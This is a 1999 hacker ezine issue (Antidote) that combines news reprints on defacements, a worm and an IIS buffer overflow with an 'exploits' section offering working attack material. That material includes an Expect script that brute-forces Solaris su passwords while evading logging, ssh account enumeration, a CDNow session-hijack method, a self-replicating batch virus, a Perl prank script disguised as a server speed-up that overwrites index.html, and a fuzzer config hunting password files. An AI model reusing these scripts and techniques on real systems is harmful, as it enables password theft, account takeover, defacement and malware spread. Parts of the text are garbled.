Volume 2 Issue 9 6/19/99 ** ** ***** * * ** * * *** ** *** ** ** *** ** * ** ** * ** ******** ** **** ******** * ** *** **** ******** *** *** ** * *** * ******** *** * ** **** **** * ** *** ********* * **** ** * *** * ** ** **** ** ** ** **** ** ** ** * *** * ** ** ** ** ** ** ** ** ** ** ** *** ********* ** ** ** ** ** ** ** ** ** ******** * ** ** ** ** ** ** ** ** ** ** ******* * ** ** ** ** ** ** ** ** ** ** ** ***** ** ** ** ** ** ** ** ****** ** **** * * **** ** * *** *** ** *** * ***** **** ** ******* * ** ** *** *** *** *** ***** * ** http://www.thepoison.org/antidote bof_ptr = (long *)buffer; for (i = 0; i < bufsize - 4; i += 4) *(bof_ptr++) = get_sp() - offs; printf ("Creating termcap f1le\n"); printf ("b1tch is Fe3lin 1t.\n"; ------------------------------ In this issue of Antidote, we have over 680 subscribers and getting more everyday! The only thing that we ask of you when you read Antidote, is that you go to: www.thepoison.org/popup.html and click on our sponsors. One issue of Antidote takes us about a week to put together and going to our sponsor only takes you about 15 seconds (if that). So please go visit our sponsor because it is the only thing we ask of you. --=\\Contents\\=-- 0.00 - Beginning 0.01 - What? 0.02 - FAQ 0.03 - Shouts 0.04 - Writing 1.00 - News 1.01 - AntiOnline Under Investigation 1.02 - Hacking No longer a Prank 1.03 - Deadly Worm on the Run 1.04 - US Sentate Cracked AGAIN 2.00 - Exploits (new & older) 2.01 - solaris_2.5.su.expect.cgi 2.02 - sun.useradd.expir_date.txt 2.03 - aim.ip_address.txt 2.04 - cdnow.account_access.txt 2.05 - ssh-2.0.brute_force.txt 3.00 - Misc 3.01 - I Only Replaced index.html 3.02 - virii.bat.txt 4.00 - ISS Portfolio 4.01 - wired.com 4.02 - infoworld.com 4.03 - iss_brain.ini.txt 4.04 - iss_injecter.c.txt FUN.S - FUN STUFF, stupid things that have no purpose or reasoning. It is just something totally stupid and MAYBE even humorous to some. SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just plane making fun of something or someone. FEAT.S - FEATURED SITES: www.nudehackers.com www.thepoison.org/masters/exploits2/ www.403-security.org www.hackernews.com ------------------------------ 0.01 --=\\What?\\=-- What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on there hands and are bored with nothing to do. If you want to read a maga- zine that teaches you how to hack etc, then you might want to go to your local book- store and see if they carry '2600'. ------------------------------ 0.02 --=\\FAQ\\=-- Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions and if the question isn't on here or doesn't make sense, then you can e-mail us with your question. > What exactly is "Antidote"? See section 0.01 for a complete description. > I find Antidote to not be shot for the beginner or does not teach you the basics, why is that? Antidote is for everyone, all we are basically is a news ezine that comes out once a week with the current news, exploits, flaws and even programming. All of the articles that are in here are recieved second hand (sent to us) and we very rarely edit anyone's articles. > I just found Antidote issues on your webpage, is there anyway I can get them sent to me through e-mail? Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will recieve a link to the current Antidote (where you can view it). > If I want to submit something, are there any 'rules'? Please see section 0.03 for a complete description. > If I submitted something, can I remain anonymous? Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say. > I submitted something and I didn't see it in the current/last issue, why is that? It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e- mails no matter what). We might use your article in future issues off Antidote. > Can I submit something that I didn't "discover" or "write"? Yes you can, we take information that is written by anyone regardless if you wrote it or not. Well thats it for our FAQ. If you have a question that is not on here or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month. ------------------------------ 0.03 --=\\Shouts\\=-- These are just some shout outs that we feel we owe to some people. Some are individuals and Some are groups in general. If you are not on this list and you feel that For some reason you should be, then please contact Lord Oak and he will post you on here and we are sorry for the Misunderstanding. Well, here are the shout outs: Lord Oak EazyMoney Duece opt1mus PBBSER oX1dation Forlorn Retribution 0dnek www.thepoison.org Like we said above, if we forgot you and/or you think you should be added, please e- mail lordoak@thepoison.org and he will be sure to add you. ------------------------------ 0.04 --=\\Writing\\=-- As many of you know, we are always open to articles/submittings. We will take almost anything that has to do with computer security. This leaves you open for: -Protecting the system (security/securing) -Attacking the system (hacking, exploits, flaws, etc....) -UNIX (really anything to do with it...) -News that has to do with any of the above.... The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please note that if we recieve two e-mails with the same topic/idea then we will use the one that we recieved first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic so that way you don't waste your time on writing something that won't be published. An example of this would be: If Joe sends me an e-mail with the topic being on hacking hotmail accounts on thursday. And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it). ------------------------------ _________________________________ ) ___ ( ( //___/ / // ) ) // ) ) ) ) /____ / // / / __ / / ( ( / / // / / ) ) ) ) / / ((___/ / ((___/ / ( ( http://www.403-security.org ) ) For the latest hacks and news ( (___________________________________) 1.01 --=\\AntiOnline Under Investigation\\=-- June 10, 1999 Brian Martin - Founder of ATTRITION Today, Attrition staff learned that the FBI have opened investigations into John Vranesevich and AntiOnline. Trusted sources close to the investigation would not comment on the depth or details, but one agent would state "it has been going on longer than you think". When asked if Vranesevich's recent "change of mission" was in any way related to the investigation, the agent only replied "no comment at this time." The timing of this investigation coincides with AntiOnline's change of heart regarding hacker activity and law enforcement. After a shocking change of mission statement in which Vranesevich practically admits to crime, he pledges to help law enforcement by "helping to serve, even if in some very small way." Vranesevich goes on to say "I have been watching you these past 5 years. I know how you do the things you do, why you do the things you do, and I know who you are." This ominous threat was not received well by the hacker community. A hacker called "h4r1k1r1" said "JP's 'contribution' to the hacker community has been little more than creating FUD, and promoting the puerile ideals of script kiddies worldwide." One staff member from Attrition going by Punkis reminded us of the now prophetic words from Vranesevich, who said "I could make just as much, if not more money, by hunting down hackers and turning them in." These words were said by Vranesevich on April 5th of this year. (FUD means 'Fear, Uncertainty, and Doubt') -EOF ------------------------------ 1.02 --=\\Hacking No longer a Prank\\=-- [www.msnbc.com] IN THIS DIGITAL AGE, your company whether it be an Amazon, E-Trade or some idea still forming is built on a brand, a process and an information infrastructure. The way your site appears on the Web; the process by which a Web visitor can maneuver and buy pro- ducts; and the ability of your site to scale, connect to suppliers and customers, and securely maintain a digital relation will determine your success. Sites that scale and allow you to shop comfortably in a digital store can quickly extend their brands from books to auctions to pet foods and beyond. Sites that crumble while you and the rest of the panicked investment community try to bail out on a stock will find themselves abandoned and facing a new realm of legal liabilities. Hacked sites visibly and fundamentally shake the faith in the brand and the products being offered at the digital storefront. This loss of faith in the brand carries over to and is magnified in the government realm. Internet access is on the verge of becoming sufficiently ubiquitous to allow organizational functions to move to the Web. If the first big thing the Web allowed was personal access and community building from the ground up, the next big thing is allowing existing organizations to use the Web to assume previously cumbersome functions. Vote on the Web? Sure. Register your car via the Web. File your taxes. Get your refund. All these functions are certainly possible. What is missing is trust. Trust is a difficult dimension to describe, but it most clearly is apparent in its absence. Don’t ask a citizenry to register to vote via the Web if the government’s top legal agencies can’t keep their home pages free from graffiti. And it is the trust that is shaken when the White House site is hacked. Or the FBI site Or the Senate site. Hacking is more than breaking a few minor laws. Hacking is certain- ly not just being a good digital citizen by showing the security gaps that now exist to prevent more serious transgressions in the future. Hacking is neither clever nor funny, nor something to be tossed off as adolescent humor from sci-fi-addled minds. Hacking retards the growth of a Web-accessible government and should hold penalties proportional to the crime. http://www.msnbc.com/news/278369.asp#BODY ------------------------------ 1.03 --=\\Deadly Worm on the Run\\=-- [www.abcnews.go.com] A new and very destructive computer worm, distributed much the same way as the Melissa virus, is quickly spreading throughout computers in the United States. Hundreds, if not thousands, of machines have already been infected. According to anti-virus experts, the Worm.Explorer.Zip virus first started in Israel on or about Sunday, spreading quickly to Europe. It was first reported in the United States on Tuesday, with the bulk of reports coming in today. If you see this window, you may already have the new worm virus. The worm then proceeds to copy itself to the system directory with the filename Explore.exe and begins to harvest e-mail addresses in order to propagate itself. (ABCNEWS.com) This worm is designed to spread from network to network very quickly, says Carey Nachenberg, chief researcher at Symantec Corp.’s Anti-Virus Research Center. This has already affected thousands of machines overseas. How It Works The virus primarily affects users of Microsoft’s Outlook e-mail program, though any e- mail user who receives a tainted message could be in trouble. The worm enters a target computer through an e-mail that appears to have come from someone the user e-mailed before. It comes with a file attachment called zipped_files.exe. The text of the e-mail customarily reads: Hi [Recipient Name]! I received your email and I shall send you a reply ASAP. Till then, take a look at the attached zipped docs. Bye If a user then clicks to open that file, the worm is activated. It proceeds to randomly destroy certain files on the target computer, then replicates itself through the e-mail addresses in the in box. This doesn’t work through Microsoft Word like Melissa did, and it has the potential to spread far more rapidly, Nachenberg says. Officials with the Computer Emergency Response Team (CERT) at Carnegie-Mellon Univer- sity in Pittsburgh have yet to figure out whether the lost data can be recovered. Reports Continue to Come In At least six different major corporations in the United States have reported the virus to Symantec. CERT technical staffer Mark Zajicek says at least 20 first-hand reports have been logged by his team, along with many second-hand reports of even more damage. We have no idea when this will drop off, Zajicek says. It’s safe to say that thousands of users have been affected. A spokeswoman for Microsoft Corp. confirmed that the company shut down its outside e- mail this morning in order to update anti-virus and contain any outbreaks on its Redmond, Wash., campus. The company is also planning to post letters to its Outlook customers on how to combat the virus. How to Stop It The easiest thing to do to stop the worm is for computer users to be aware of it so that they won’t click on the zipped_files.exe icon to activate it. Nachenberg says that although corporate users are far more likely to become infected by the worm, Outlook users have learned safe computing practices from the Melissa scare, and may halt the spread of the worm before it causes major damage. I think many corporations did a good job of educating their users about safe computing, Nachenberg says. Hopefully this won’t spread as far as the Melissa virus. Users who see the virus in their in boxes should leave the attachment alone, delete the e-mail, and let their system administrators know about the infection immediately. Anti- virus software should also be used. Symantec Corp. and other anti-virus software vendors already have patches on their Web sites. http://www.abcnews.go.com/sections/tech/DailyNews/worm990610.html ------------------------------ 1.04 --=\\US Sentate Cracked AGAIN\\=-- [www.wired.com] For the second time in two weeks, crackers on Friday defaced the Web page of the US Senate. The official Senate Web site was down as of Friday afternoon while administrators repaired and restored the network. A cracker replaced the official page with one that said "free Kevin Mitnick, free Zyklon." An employee of US Senate Technical Operations said the site went down around 4 p.m. EST but couldn't say when the site might come back up. "Those of us who haven't been hacked yet are just trying to lay low and beef up secur- ity as we can," said Sean Donelan, a network engineer for Data Research Associates, a nationwide Internet service provider that works with state governments, libraries, and schools. Donelan said that each government agency is having to reinforce security independently and that outside vendors working with the government departments consider their secur- ity solutions proprietary. "[We] are also trying not attract attention and not waving a red flag challenging anyone to 'test' our security," Donelan said. The Senate home page was previously cracked on 27 May. In that incident, crackers filled the page with comments critical of the FBI. That hack was claimed by the group Masters of Downloading, who broadcast the message "MAST3RZ 0F D0WNL0ADING, GL0B4L D0MIN8T10N '99!" on the Senate's site. The Varna Hacking Group claimed responsibility for the latest Web vandalism. The organ- ization claims it is a "noncommercial hacking group." Varna is based in Bulgaria, according to reports of a 1998 attack that members claimed to have launched against the Cartoon Network. Zyklon, mentioned in Friday's incident, is alleged to be a 19-year-old hacker from Shoreline, Washington. He was indicted in early May for his alleged involvement in other government site hacks. Many of the recent hacks demanded justice for imprisoned cracker Kevin Mitnick, who has been in jail for more than four years awaiting trial on a broad swath of criminal charges. http://www.wired.com/news/news/politics/story/20180.html ------------------------------ 1.05 --=\\Voting Mouse\\=-- [www.usnews.com] You can already bank, buy, and bar gain on the Internet. Even pay your taxes. What's next? Voting. At least if some Louisiana politicians have their way. The Louisiana Republican Party late last week was set to allow registered GOP voters to cast their ballots via computer in the Jan. 29, 2000, presidential caucus. "What this does is create thousands of polling places that never existed before," says Carey Holliday, an attorney and member of a GOP advisory panel that voted, 5 to 2, to endorse the use of Internet voting. After all, voters need only plunk down and switch on their computer, tap a few keys, and civic duty accomplished. Several legislatures are also consider ing allowing computer voting in statewide elections. A pilot Pentagon program will allow residents of Florida, Missouri, South Carolina, Texas, and Utah living abroad to vote over the Web next year. In Louisiana, Republicans hope the move will push up voter turnout, which hovered at an anemic 5 percent in the state's last presidential caucus in 1996. "It's been a big problem for us," says Rep. Chuck McMains. "I think this could be a great opportunity for people to par ticipate and, in the process, get better representation." Party officials blamed the abysmal show ing on a lack of polling places. Recent studies by VoteHere.Net the software com pany that developed the voting system Louisiana Republicans are considering show computer balloting would be em braced by 76 percent of voters ages 18 to 30 and by 50 percent of voters over age 50. What effect this would have on who wins the elections is anybody's guess. Hacker fraud. It sounds simple enough. Yet not everyone is convinced. Critics' major concern: the potential for abuse. But VoteHere.Net says its program is one of the toughest for hackers to crack or voters to fool. "Ours is the only election system that automatically prevents tampering and box stuffing as it sniffs out voter fraud attempts and malicious hackers," says Don Carter, senior vice president of VoteHere .Net. To safeguard against fraud, voters would be required to provide infor mation such as birth dates and Social Security numbers. To preserve privacy, the system uses one of the toughest encryp tion programs available to the public, says Carter, and balloters must give a voter encrypted registration number (VERN) provided when they register to vote via computer to guarantee they vote only once. That's not good enough for one key dis senter. "I don't totally disagree with the concept, but our traditional process is a good one," says party chairman Mike Fran cis. His solution is to increase the voting sites. "You could give away TV sets at the polling places, and you still wouldn't get more than 100,000 voters [out of the state's approximately 600,000 Republi cans] to show up," he says. http://www.usnews.com/usnews/issue/990621/internet.htm ------------------------------ 10001010100101110101010101001011101010101000 0 1 1 Y88b Y88 888 888 888 88e e88'Y88 0 1 Y88b Y8 888 888 888 888b d888 'Y 1 0 b Y88b Y 8888888 888 8888D C8888 1 0 8b Y88b 888 888 888 888P Y888 ,d 1 1 88b Y88b 888 888 888 88" "88,d88 0 1 1 1 http://www.nudehackers.com 0 0 0 01001010110101010001011010010111010100101011 2.01 --=\\solaris_2.5.su.expect.cgi\\=-- #!/usr/local/bin/expect -- # A quick little sploit for a quick round of beers :) mudge@L0pht.com # # This was something that had been floating around for some time. # It might have been bitwrior that pointed out some of the oddities # but I don't remember. # # It was mentioned to Casper Dik at some point and it was fixed in # the next rev of Solaris (don't remember if the fix took place in # 2.5.1 or 2.6 - I know it is in 2.6 at least). # # What happened was that the Solaris 2.5 and below systems # had /bin/su written in the following fashion : # # attempt to SU # | # succesfull # / \ # Y N # | | # exec cmd sleep # | # syslog # | # exit # # There were a few problems here - not the least of which was that they # did not bother to trap signals. Thus, if you noticed su taking a while # you most likely entered an incorrect password and were in the # sleep phase. # # Sending a SIGINT by hitting ctrl-c would kill the process # before the syslog of the invalid attempt occured. # # In current versions of /bin/su they DO trap signals. # # It should be noted that this is a fairly common coding problem that # people will find in a lot of "security related" programs. # # .mudge if { ($argc < 1) || ($argc > 1) } { puts "correct usage is : $argv0 pwfile" exit } set pwfile [open $argv "r"] log_user 0 foreach line [split [read $pwfile] "\n"] { spawn su root expect "Password:" send "$line\n" # you might need to tweak this but it should be ok set timeout 2 expect { "#" { puts "root password is $line\n" ; exit } } set id [ exp_pid ] exec kill -INT $id } ------------------------------ 2.02 --=\\sun.useradd.expir_date.txt\\=-- This has been tested and verified only on Solaris 7. Sun has provided a useradd binary as well as the gui (admintool) for adding new users. This program (it's a binary in Solaris 7) allows the "-e" parameter which purports to set the expiration date for a new account. The man page for it says: -e expire Specify the expiration date for a login. After this date, no user will be able to access this login. expire is a date entered in any format you like (except a Julian date). If the date format that you choose includes spaces, it must be quoted. For example, you may enter 10/6/90 or "October 6, 1990". A null value (" ") defeats the status of the expired date. This option is useful for creating temporary logins. The key here is that is says: "in any format you like". Using the system as it ships and using the parameter as (for example) "-e 6/30/2000" (in a vain attempt to avoid Y2K confusion) results in an expiration date of June 30, 2020, so if you are expecting the user accounts to expire soon, you will be a little disappointed. If expiration dates are critical, you have a real problem - users can login for 20 years after you thought you had expired them! Workaround (supplied by Sun): replace /etc/datemsk with: #ident %m/%d/%y %I:%M:%S %p %m/%d/%Y %I:%M:%S %p %m/%d/%y %H:%M:%S %m/%d/%Y %H:%M:%S %m/%d/%y %I:%M %p %m/%d/%Y %I:%M %p %m/%d/%y %H:%M %m/%d/%Y %H:%M %m/%d/%y %m/%d/%Y %m/%d %b %d, %Y %I:%M:%S %p %b %d, %Y %H:%M:%S %B %d, %Y %I:%M:%S %p %B %d, %Y %H:%M:%S %b %d, %Y %I:%M %p %b %d, %Y %H:%M %B %d, %Y %I:%M %p %B %d, %Y %H:%M %b %d, %Y %B %d, %Y %b %d %m\%d\%H\%M\%y %m\%d\%H\%M\%Y %m\%d\%H\%M %m\%d\%H %m%d Your mileage may vary. I have not tested this to make sure it works correctly with 2-digit years (lower case 'y' in the mask above.) Sun has been notified of this and of the posting to BUGTRAQ. Chad Price cprice@MOLBIO.UNMC.EDU ------------------------------ 2.03 --=\\aim.ip_adderess.txt\\=-- IU Uprising (iuprising@HOTMAIL.COM) Tue, 8 Jun 1999 18:39:50 PDT In the newest version of AIM (AOL Instant Messenger) there is a way to transfer files. When you are transferring the file, you can open a DOS prompt and type: netstat -a -n By doing this you (obviously) can get the person's IP address. Usually it will be on port 5190. This may seem pointless because usually not much can be done with simply an IP address, but under certain circumstances this can be useful. a|chEmist ------------------------------ 2.04 --=\\cdnow.account_access.txt\\=-- Last week I stumbled accross the following security hole in CDNow!, the online cd-store. I emailed CDNow! regarding this immediately but as yet have not have any confirmation of receipt or response, so I decided to post the information here. This is a copy of the email that I sent to CDNow. Security Hole Found I was just looking at my gift list, and pasted the URL to a mailing list. That is, the URL in my location bar, after doing so I thought, wait, thats not the URL I should have posted, so then sent the proper URL thinking that CDNOW is password protected and noone would be able to get to my account, but I decided to check by telnetting to a remote machine and going to that URL. The result was, I got a rejected cookie, and the page continued to load my gift list (in edit mode), I then followed a link to my account history, and details, and initiated steps to order a cd. I'm assuming the SID paramter in the URL was looking up the open transaction/connection that I made from my local machine and was using that. My assumption is that this URL would only be valid for a certain amount of time, so the security flaw will eventually in an hour or so be closed off (I hope), however, the fact is that this hole does exist. Mark Derricutt DerricuttM@PBWORLD.COM ------------------------------ 2.05 --=\\ssh-2.0.brute_force.txt\\=-- Aleph ... Sorry if it is an old bug ... i have tested a bug in ssh-2.0.12. any remote attacker can guess real account in the machine Details when a ssh client connects to the daemon it has a number ( default three ) of attempts to guess the correct password before disconnecting if you try to connect with a correct login, but you only have once if you try to connect with a no correct login. EXAMPLE alfonso is not user ( login ) in 192.168.0.1 $ssh 192.168.0.1 -l alfonso alfonso's password: Disconnected; authentication error (Authentication method disabled.). $ altellez is user ( login ) in 192.168.0.1 $ssh 192.168.0.1 -l altellez altellez's password: altellez's password: Now the remote attacker known that altellez is a true login in 192.168.0.1 QUICK FIX Edit the file sshd2_config (usually at /etc/ssh2), set the value of "PasswordGuesses" to 1. I only has tested it with ssh-2.0.12 Alfonso Lazaro Tellez altellez@ip6seguridad.com ------------------------------ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- FUN.S #!/usr/bin/perl print "Content-type: text/html\n\n"; # Make your server go faster with this script! # Works on any OS and minor editing is needed! $path = "/home/username/"; # homedirectory chdir($path); open (EDIT,">index.html"); print EDIT < Lord Oak 0wnz me!
I b0w to Lord Oak!
EOF close (EDIT); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 3.01 --=\\I Only Replaced index.html\\=-- It would appear that the k-r4d kiddies who deface web pages have no concept of WHY their shenanigans illicit such a violent response from the companies they attack. This brief article will list some of the behind the scenes events that occur after the "harmless" replacement of index.html by our oh-so-favorite political activists. 1. The company is notified, usually by a customer, that their web page has been changed. The server admin, Web Master, or whomever is responsible for the content is usually the first person to be told of this event as the company probably doesn't have an incident response plan. 2. The admin shits a brick and tells his manager. The administrator, now in fear for his job, has to bite the bullet and tell his manager that the company has been "hacked". He's probably afraid that the attacker got in through his weak password, or one of the boxes he know he should have upgraded six months ago. 3. Upon hearing this, the manager shits a brick. The mid-level manager now fears for HIS job knowing that the brunt of upper management's wrath will fall on his shoulders for not securing the systems. The manager tries desperately to figure out whom to tell in upper management that will not fire him on the spot. He calls his manager (usually a VP type) and tells her the news. 4. Upon hearing this, she freaks out and shits a brick. The VP calls Human Resources, Legal, Security (if it exists), and the Director of Engineering or some other high- level geek type. The group collectively decides if the site should be taken down or remain up. A call is also made to the CEO or other chieftain to inform him of the sit- uation. After a quick consultation with the in-house counsel, the decision to contact or not contact law enforcement is made. Usually, the upper level types are in knee- jerk mode and want to aggressively pursue the intruder "no matter what". 5. All this time, the overworked admin has been scouring his systems looking for traces of how the attacker got in. Despite the attacker's claims that "he only replaced index.html" the admin's manager wants EVERY system checked and any possible means of entry sealed off. The admin will now try to perform a comprehensive security audit in an hour. 6. The upper level types contact the Marketing department to figure out how to handle the impact to the company's image. Never faced with this sort of problem before, the Director of Marketing frets and calls all her people in for "a brainstorm" on how to handle the situation. 7. The system is probably backed-up, taken down, and replaced with a newer box or a significant upgrade (introducing new bugs) is made to the system. This takes the busy admin the better part of a day. Normally, this could be accomplished in a few hours, but with visibility on the VP and above level, the admin makes sure he does is perfectly. 8. If law enforcement was called-in, they now spend time with the administrators and lawyers to figure out if they have a case (probably not, most of the evidence was accidentally destroyed by the admin in the first 4 hours after the incident). 9. Upper level types now decree that the systems will be secured and that nothing like this will ever happen again. It's likely that big name consultants are brought in at $200+/hour to assess the business and make recommendations to improve the site's secur- ity. Since the admin is already busy doing day-to-day tasks, the consulting firm probably implements their recommendations (at $200+/hour). 10. After a few weeks, things return to normal. The company has new ACLs, a new fire- wall, and maybe some new policies. Now, looking at this, one can see the number of personnel involved and the amount of time invested in recovering from the "harmless" defacing of index.html. I haven't even addressed the additional problems posed when the admins discover a trojanized binary or unauthorized access to source code or other company trade secrets. This is just the simple stuff. "But the attacker said in his 'message' that he backed-up index.html. All they had to do was replace it with the original!" No you stupid fool, no. The attacker has publicly humiliated a corporation, has shown the world that the site's security is inadequate, and has caused significant personal turmoil for 5 or more people. Furthermore, if I come home one day to find my front door open and a note attached that says "Hi. Broke into your place. Only moved your stuff around. Didn't take anything. Love, r0bb3r" am I supposed to believe that? Would you? If the company affected is publicly traded, they are legally _required_ to investigate and take measures to ensure that a similar incident doesn't occur. If they don't, their shareholders can sue for negligence. Now, I can't possibly justify the tens of millions in losses claimed by companies in cases like Mitnick or others - that's lunacy. However, reading the above, I hope it becomes clear that there is significant time and money spent to clean up these "simple" attacks. -Anonymous ------------------------------ 3.02 --=\\virii.bat.txt\\=-- @echo off>nul.virii if exist %0.bat set virii=%0.bat if exist %0 ste virii=%0 if !%1==! goto virii_start if %1==/infect goto virii_infect if %1==/find goto virii_find :virii_start REM Will find all batch files in current diectory echo Finding files to infect with virii for %%a in (*.bat) do command /e:10000 /c %virii% /infect %%a goto virii_end :virii_infect REM This part makes sure virii does not infect itself or REM previoulsy infected files echo Checking %2 and making sure it has not been previously infected set file_virii=%0 find "file_virii=%0" <%2>viriix.bat call viriix del viriix.bat if "%file_virii%=="viriix echo %2 is allready infected if "%file_virii%--"viriix exit REM End of check echo The virii is now infecting %2 type %2 > viriix.bat find "virii" <%virii%>> viriix.bat goto virii_end :virii_end I don't know what use this could be apart from an example of redirecting outputs and "for" commands. [)igital^[)istortion ICQ 34585986 ------------------------------ 4.01 --=\\wired.com\\=-- [www.wired.com] A major security flaw in a Microsoft Web server could allow crackers to take complete control of e-commerce Web sites, security experts warned Tuesday. The flaw in Microsoft's Internet Information Server 4.0 allows unauthorized remote users to gain system-level access to the server, according to Firas Bushnaq, CEO of eEye , the Internet security firm that discovered it. "This hole is so serious it's scary," said Jim Blake, a network administrator for Irvine, a city in southern California. "With other [Windows NT] security holes, crackers have needed to gain some level of user access before executing code on the server. This is different.... Anybody off the Web can crack IIS," he said. More than 1.3 million Microsoft IIS servers are up and running on the Web. Nasdaq, Walt Disney, and Compaq are among the larger e-commerce operations run off the server, according to NetCraft Internet surveys. Microsoft confirmed that the problem exists and said that it is working on a fix. Customers, however, have not been notified. "Normally we will post the problem and the bug fix at the same time," said Microsoft spokeswoman Jennifer Todd. "We take these security issues very seriously, and the patch will be available [soon]." The fix will be posted to Microsoft's security Web site , "probably in the next couple of days," Todd said. The exploit is just one of a long list of security flaws affecting IIS 4.0. In May, security experts found an exploit that enabled crackers to gain read access to files held on IIS when they requested certain text files. Last summer, an exploit known as the $DATA Bug granted any non-technical Web users access to sensitive information within the source code used in Microsoft's Active Server Page, which is used on IIS. And in January, a similar IIS security hole was discovered, one that exposed the source code and certain system settings of files on Windows NT-based Web servers. But the latest problem appears to be the most serious because of the level of access it reportedly allows. "The exploit gives crackers access to any database or software residing on the Web server machine," said Bushnaq. "So they could steal credit-card information or even post counterfeit Web pages." For instance, crackers could exploit the bug to modify stock prices at one of the many news and stock information sites running IIS. The hole allows remote users to gain control of an IIS 4.0 server by creating what is known as a "buffer overflow" on .htr Web pages -- an IIS feature designed to enable users to remotely change their passwords. A buffer overflow can occur when a system is fed a value much larger than expected. In the case of the bug, the Dynamic Link Library (DLL) governing the .htr file extension, called ISM.DLL, can be overloaded by running a utility that loads too many characters into the library. Once overloaded, the DLL is disabled and the content of the overflow "bleeds" into the system. "Normally, this would just crash the system," said Space Rogue, a member of L0pht Heavy Industries, an independent security consulting firm that last year testified before the United States Senate on government information security. "But a good cracker can write an exploit where the data that overflows will actually be a executable program that will run as machine code," said Space Rogue. Such a move could give a cracker complete control of the target system. The overflow executable program can be used to run a system-level program that will deliver the equivalent of a DOS command window to an attacker's PC. To demonstrate the hole, eEye wrote a program called IIS Hack that will enable users to crack and execute code on any IIS 4.0 Web Server. However, disabling or removing the .htr password utility will not fix the problem, according to Bushnaq. "You have got to go through a series of steps to remove the faulty [code]." Eeye discovered the problem while beta testing a network security auditing tool. "Remote exploits are about the most serious problems you can have with a Web server," said Space Rogue. "It gives the attacker root privileges, so the cracker not only has access to the IIS server but [to] software running on that machine." "In many corporate sites today, this will give the cracker access to the entire network" Eeye is a software development firm specializing in security audit tools. Chief executive Bushnaq previously founded the electronic commerce site ECompany.com . http://www.wired.com/news/news/technology/story/20231.html ------------------------------ 4.02 --=\\infoworld.com\\=-- [www.infoworld.com] A small security consulting firm traded punches with Microsoft this week over how to publicize a security flaw in Microsoft's Web server software. Microsoft posted an alert and workaround June 15, after the other company, eEye, posted a way to exploit the flaw, saying it was necessary to draw attention to the threat it poses. "It was demonstrating how serious this is. Microsoft has not responded to us since then," Firas Bushnaq, eEye CEO, said Thursday. Microsoft countered that it had been cooperating with eEye on the problem until the other company broke Microsoft's policy of publishing security warnings only once there is a remedy, so as not to reveal a breach to would-be exploiters. "Deliberately publishing a tool on one's Web site to let malicious users hurt innocent people is not being part of the solution," Microsoft security product manager Scott Culp countered on Thursday. "It is a mystery to us why [eEye] suddenly and abruptly chose to stop working with us and take this public." The flaw is a "buffer overflow" in Microsoft's Internet Information Server (IIS) 4.0. This could allow junk or malicious code to overwrite executable code, thereby making the Web server either crash or execute unauthorized commands, Culp said. Buffer overflows are caused by programmer error and are "very common... one of the biggest of all network security problems," Bushnaq said. The IIS 4.0 bug could give a hacker access to various data on the targeted Web server, including access to company files or customer information, depending on how the network is configured and which break-in approach is used, Bushnaq added. "It's a very, very serious problem that people need to fix as soon as possible," Bushnaq said. Officials at eEye notified Microsoft of the problem June 8, but were frustrated by the lack of response during the next several days, Bushnaq said. On Monday, June 14, the company decided to make the problem public. Since then, eEye has gotten hundreds of e-mail messages in favor of its decision, compared to about four criticizing it, Bushnaq said. "The big issue now is that Microsoft's PR is [painting] eEye as a company that's irresponsible and pointing to something bad," Bushnaq said. But Culp said Microsoft's security team had been working intensively with eEye, as it does with other companies and users that report security problems. They had had exchanged about 20 e-mail messages last week, before eEye unilaterally decided to go public, he said. "[Their decision] left a lot of people at risk ... compounded by irresponsibly publishing that [exploitation] tool," Culp said. Microsoft hopes to release the final patch very soon, Culp said. In the meantime, the company is offering a workaround in its June 15 security bulletin, which can be found at www.microsoft.com/security/bulletins/ms99-019.asp eEye's patch can be found at www.eeye.com/database/advisories/ ad06081999/ad06081999-ogle.html eEye, a unit of eCompany LLC, in Corona del Mar, Calif., is at www.eeye.com. Microsoft Corp., in Redmond, Wash., is at www.microsoft.com. http://www.infoworld.com/cgi-bin/displayStory.pl?990617.hneeye.htm ------------------------------ 4.03 --=\\iss_brain.ini.txt\\=-- [General] Title=HTTP Miner [Commands] 1=GET /%%$RPT(65,40,10)%%.%%extention%% HTTP/1.0 ;2=GET /%%cgi-bin%%/%%passwordpath%%/%%passwordfile%%.%%extention%% HTTP/1.0 [Variables] cgi-bin=cgi-bin,cgi,bin,cgibin,data,dat,exec,apps,secure,hide, extention=htr,html,htx,asp,exe,xml,ini,txt,dat,dbf,lst,data, passwordpath=password,passwords,pass,users,clients,admins,store, passwordfile=password,passwords,pass,users,clients,admins,store, c0=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, c1=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_, 